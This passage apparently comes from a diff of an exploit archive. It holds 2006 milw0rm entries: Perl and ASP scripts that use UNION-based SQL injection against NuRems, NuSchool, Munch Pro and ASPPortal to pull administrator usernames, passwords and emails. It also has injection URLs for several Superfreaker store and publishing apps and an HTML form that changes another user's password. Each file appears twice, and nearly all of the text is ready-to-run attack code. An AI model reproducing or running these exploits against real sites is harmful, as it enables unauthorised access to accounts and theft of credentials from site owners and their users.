$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]

View file

@ -1,73 +1,73 @@
#!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n";
}
if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n";
}
if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]

View file

@ -1,20 +1,20 @@
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-11]
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-11]

View file

@ -1,69 +1,69 @@
#!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]
#!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11]

View file

@ -1,69 +1,69 @@
#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12]
#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12]

View file

@ -1,192 +1,192 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-11-12]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-11-12]

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL]
Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL]
Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]

View file

@ -1,22 +1,22 @@
*******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
# Dork : UPublisher
*******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL]
Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
# Dork : UPublisher
*******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL]
Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]

View file

@ -1,25 +1,25 @@
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]

View file

@ -1,36 +1,36 @@
<!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID
Next Click "Profile"
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-11-13]
<!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID
